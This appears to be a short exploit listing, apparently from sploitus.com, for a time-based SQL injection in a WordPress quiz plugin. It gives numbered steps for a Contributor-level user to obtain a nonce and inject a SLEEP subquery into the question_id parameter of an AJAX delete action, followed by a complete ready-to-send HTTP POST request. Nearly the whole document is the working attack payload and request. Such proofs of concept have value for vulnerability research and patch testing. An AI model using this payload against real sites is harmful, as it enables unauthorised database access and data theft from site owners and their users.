Share
## https://sploitus.com/exploit?id=WPEX-ID:E3EEE6BC-1F69-4BE1-B323-0C9B5FE7535E
1) You will need a valid nonce for deletion of quiz questions. 
2) Sign in as a Contributor, create a quiz with at least one question.
3) Edit the Quiz and click the "Delete All" button to fire off the right request with a valid nonce.
4) Replace the question ID with the payload below to sleep for 5 seconds: 

(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: test.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://test.site/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: http://test.site
Connection: keep-alive
Cookie: Contributor_Cookie

action=qsm_bulk_delete_question_from_database&question_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)&nonce=577a29f6f1